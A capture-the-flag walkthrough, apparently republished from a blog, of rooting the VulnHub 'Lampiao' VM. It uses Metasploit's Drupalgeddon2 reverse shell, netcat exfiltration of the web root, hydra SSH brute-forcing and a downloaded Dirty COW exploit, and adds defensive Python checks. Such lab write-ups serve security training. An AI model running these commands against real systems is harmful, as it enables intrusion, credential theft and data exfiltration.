Lampiao target machine
A quick writeup for this target VM; I referred to many English-language blogs along the way, such as
https://xz.aliyun.com/t/2647
Download: https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM
Download (Mirror): https://download.vulnhub.com/lampiao/Lampiao.zip
Download (Torrent): https://download.vulnhub.com/lampiao/Lampiao.zip.torrent ( Magnet)
Attacker machine: Kali 10.211.55.11 "root@kali-linux:"
Target machine: IP 192.168.89.134 "tiago@lampiao"
Penetration
Ports
root@kali-linux:~# nmap -p1-2000 192.168.89.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-03 22:13 HKT
Nmap scan report for 192.168.89.134
Host is up (1.0s latency).
Not shown: 1997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1898/tcp open cymtec-port
PORT 1898
WEB SERVER
root@kali-linux:~# nikto -h 192.168.89.134:1898
+ Server: Apache/2.4.7 (Ubuntu)
...
+ "robots.txt" contains 68 entries which should be manually viewed.
...
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3268: /sites/: Directory indexing found.
http://192.168.89.134:1898/CHANGELOG.txt
Drupal 7.54, 2017-02-01
root@kali-linux:~# msfdb start
[+] Starting database
root@kali-linux:~# msfconsole
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
2 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
3 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
4 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
5 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
6 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
7 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
8 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.89.134
rhost => 192.168.89.134
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
rport => 1898
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show targets
0 Automatic (PHP In-Memory)
1 Automatic (PHP Dropper)
2 Automatic (Unix In-Memory)
3 Automatic (Linux Dropper)
4 Drupal 7.x (PHP In-Memory)
...
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set target 0
target => 0
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run
[*] Started reverse TCP handler on 10.211.55.11:4444
[*] Sending stage (38247 bytes) to 10.211.55.2
[*] Meterpreter session 1 opened (10.211.55.11:4444 -> 10.211.55.2:49652) at 2019-06-03 22:42:55 +0800
meterpreter > shell
Process 3584 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$
tar czvf test.tar.gz *                      # on the target, inside /var/www/html
nc -lvp 4445 > test.tar.gz                  # on Kali: listen and receive the archive
nc -w 3 10.211.55.11 4445 < test.tar.gz     # on the target: send it to Kali
root@kali-linux:~# nc -lvp 4445 > test.tar.gz
listening on [any] 4445 ...
10.211.55.2: inverse host lookup failed: Unknown host
connect to [10.211.55.11] from (UNKNOWN) [10.211.55.2] 49957
curl http://192.168.89.134:1898/test.tar.gz
Download >> audio.m4a >> "user tiago" (the audio file gives away the username tiago)
find . -name "*.php" | xargs grep -H "password"
'username' => 'drupaluser',
'password' => 'Virgulino',
PORT 22
cewl -w dict.txt http://192.168.89.134:1898/?q=node/1
hydra -l tiago -P dict.txt -vV -e ns 192.168.89.134 ssh
[22][ssh] host: 192.168.89.134 login: tiago password: Virgulino
ssh -A -p 22 tiago@192.168.89.134
Privilege escalation
tiago@lampiao:~$ uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
cd /tmp
wget -q -O linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation | exploits/windows/local/35905.c
Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities | exploits/ios/webapps/35775.txt
Helpdesk Pilot Knowledge Base 4.4.0 - SQL Injection | exploits/php/webapps/10788.txt
Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit) | exploits/linux/local/44696.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC) | exploits/linux/dos/41457.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | exploits/linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | exploits/linux_x86-64/local/40049.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | exploits/linux/local/43418.c
PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow | exploits/windows/local/1406.php
Photo Manager Pro 4.4.0 iOS - Code Execution | exploits/ios/webapps/36798.txt
Photo Manager Pro 4.4.0 iOS - Local File Inclusion | exploits/ios/webapps/36796.txt
Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities | exploits/php/webapps/46549.txt
eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities | exploits/php/webapps/36089.txt
Shellcodes: No Result
Available information:
Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 14.04.5
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
71 kernel space exploits
39 user space exploits
Possible Exploits:
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Tags: [ ubuntu=14.04{kernel:4.4.0-*} ],ubuntu=16.04{kernel:4.8.0-*}
Rank: 8
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/cve-2017-1000112/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
Rank: 8
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,[ ubuntu=14.04 ]{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Rank: 7
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Rank: 7
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 7
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Rank: 3
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Tags: [ ubuntu=14.04 ],fedora=22
Rank: 3
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2015-3202] fuse (fusermount)
Details: http://seclists.org/oss-sec/2015/q2/520
Tags: debian=7.0|8.0,[ ubuntu=* ]
Rank: 3
Download URL: https://www.exploit-db.com/download/37089
Comments: Needs cron or system admin interaction
[+] [CVE-2015-1318] newpid (apport)
Details: http://openwall.com/lists/oss-security/2015/04/14/4
Tags: [ ubuntu=14.04 ]
Rank: 3
Download URL: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Rank: 1
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/cve-2017-7308/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Rank: 1
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Tags: ubuntu=16.04{kernel:4.4.0-(21|38|42|98|140)-generic}
Rank: 1
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2015-1318] newpid (apport) 2
Details: http://openwall.com/lists/oss-security/2015/04/14/4
Tags: ubuntu=14.04.2
Rank: 1
Download URL: https://www.exploit-db.com/download/36782
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Rank: 0
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
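The "Tags:" lines above are what the suggester compares against the host's distribution, version and kernel; the bracketed alternative is the one it matched. The code below is an added example (not the suggester's own code) that re-implements that matching from the grammar visible in the output, so the list can be re-checked by hand for this host or for a patched kernel; the tag grammar (comma-separated `DISTRO=VERSION_PATTERN{kernel:KERNEL_PATTERN}` with `(a|b)` alternation and `*` wildcards, brackets as highlighting) is assumed from the output.

```python
import re

# Values taken from the uname -a and suggester output on this page.
UNAME = "Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux"
CHOCOBO_TAGS = "[ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]"


def _glob_to_re(pat):
    """LES pattern -> regex: keep (|) alternation, '*' becomes '.*', escape the rest."""
    return "".join(ch if ch in "(|)" else ".*" if ch == "*" else re.escape(ch) for ch in pat)


def _split_top(s):
    """Split on commas that are not nested inside (...) or {...}."""
    parts, depth, cur = [], 0, ""
    for ch in s:
        if ch in "({":
            depth += 1
        elif ch in ")}":
            depth -= 1
        if ch == "," and depth == 0:
            parts.append(cur)
            cur = ""
        else:
            cur += ch
    parts.append(cur)
    return [p.strip() for p in parts if p.strip()]


def kernel_release(uname_a):
    """Third field of `uname -a`, e.g. '4.4.0-31-generic'."""
    return uname_a.split()[2]


def tag_matches(tags, distro, distro_version, kernel):
    """True if any alternative in a Tags: line fits this distro, version and kernel."""
    for alt in _split_top(tags.replace("[", "").replace("]", "")):
        m = re.fullmatch(r"(\w+)=([^{]+?)\s*(?:\{kernel:(.+)\})?", alt)
        if not m or m.group(1).lower() != distro.lower():
            continue
        ver_pat, kern_pat = m.group(2), m.group(3)
        # "14.04" also matches "14.04.5": trailing point-release components are allowed.
        if not re.fullmatch("(?:" + _glob_to_re(ver_pat) + r")(?:\.\d+)*", distro_version):
            continue
        if kern_pat and not re.fullmatch(_glob_to_re(kern_pat), kernel):
            continue
        return True
    return False
```

Running the same tags against the kernel a patched image actually boots is the quickest way to confirm that an update closed the entries listed here.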
40611
tiago@lampiao:/tmp$ curl https://www.exploit-db.com/download/40611.c > dirtyc0w.c
tiago@lampiao:/tmp$ chmod 0404 foo
tiago@lampiao:/tmp$ gcc -pthread dirtyc0w.c -o dirtyc0w
dirtyc0w.c:1:1: error: expected identifier or ‘(’ before ‘<’ token
The error at line 1 shows that what curl saved starts with "<", i.e. an HTML page rather than C source, so this copy cannot be built.
40847
tiago@lampiao:~/test$ wget https://www.exploit-db.com/download/40847.cpp
--2019-06-04 12:37:07-- https://www.exploit-db.com/download/40847.cpp
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2019-06-04 12:37:10 ERROR 404: Not Found.
It cannot be downloaded directly, so open https://www.exploit-db.com/exploits/40847 and copy the exploit body by hand:
tiago@lampiao:~$ vim test/40847.cpp
tiago@lampiao:~$ ls
dcow test
tiago@lampiao:~$ ./dcow -s
Running ...
Password overridden to: dirtyCowFun
Received su prompt (Password: )
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
cp /tmp/.ssh_bak /etc/passwd
rm /tmp/.ssh_bak
root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~#
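The restore commands above put back the /etc/passwd copy that dcow saved to /tmp/.ssh_bak, which is the file the PoC rewrites (it replaces root's password field so that su accepts the printed password). As an added defensive example, not part of the writeup, the following checks flag exactly that kind of tampering: a hash stored in /etc/passwd instead of the "x" placeholder, an empty password field, extra UID 0 accounts, and entries that differ from a known-good baseline. The passwd contents are constructed samples and the hash value is a placeholder.

```python
# Constructed sample of a clean /etc/passwd (three entries are enough).
CLEAN = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tiago:x:1000:1000:tiago,,,:/home/tiago:/bin/bash
"""
# Same file after root's "x" has been replaced by a crypt hash (placeholder value).
TAMPERED = CLEAN.replace("root:x:", "root:$6$PLACEHOLDER$HASH:", 1)

SHADOW_MARKERS = ("x", "*", "!", "!!")  # values that mean "real hash lives in /etc/shadow"


def _entries(text):
    """Map line number -> list of fields, skipping blanks and comments."""
    rows = {}
    for n, line in enumerate(text.splitlines(), 1):
        if line.strip() and not line.startswith("#"):
            rows[n] = line.split(":")
    return rows


def audit_passwd(text):
    """Return (line_number, message) findings for entries that look tampered."""
    findings = []
    for n, f in _entries(text).items():
        if len(f) != 7:
            findings.append((n, "malformed entry"))
            continue
        name, pw, uid = f[0], f[1], f[2]
        if pw == "":
            findings.append((n, f"{name}: empty password field, login needs no password"))
        elif pw not in SHADOW_MARKERS:
            findings.append((n, f"{name}: password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append((n, f"{name}: additional UID 0 account"))
    return findings


def changed_users(baseline, current):
    """Usernames whose entry differs from a known-good copy (e.g. the /tmp/.ssh_bak backup)."""
    base = {f[0]: f for f in _entries(baseline).values()}
    cur = {f[0]: f for f in _entries(current).values()}
    return sorted(u for u in base.keys() | cur.keys() if base.get(u) != cur.get(u))
```

On a real host, run audit_passwd over the live file and changed_users against a baseline kept off the box; a hash in the root entry is a strong indicator of this exact technique.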
Reproduced from: https://www.jianshu.com/p/76e6fad4d68e